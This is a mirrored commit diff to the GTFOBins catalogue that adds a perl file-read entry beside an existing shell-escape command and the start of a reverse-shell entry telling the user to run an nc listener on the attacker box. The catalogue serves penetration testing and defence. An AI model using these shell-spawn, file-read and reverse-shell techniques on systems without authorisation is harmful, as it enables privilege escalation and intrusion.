mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Add perl file-read
This commit is contained in:
		@@ -2,6 +2,10 @@
 | 
				
			|||||||
functions:
 | 
					functions:
 | 
				
			||||||
  shell:
 | 
					  shell:
 | 
				
			||||||
    - code: perl -e 'exec "/bin/sh";'
 | 
					    - code: perl -e 'exec "/bin/sh";'
 | 
				
			||||||
 | 
					  file-read:
 | 
				
			||||||
 | 
					    - code: |
 | 
				
			||||||
 | 
					        LFILE=file_to_read
 | 
				
			||||||
 | 
					        perl -ne print $LFILE
 | 
				
			||||||
  reverse-shell:
 | 
					  reverse-shell:
 | 
				
			||||||
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 | 
					    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 | 
				
			||||||
      code: |
 | 
					      code: |
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user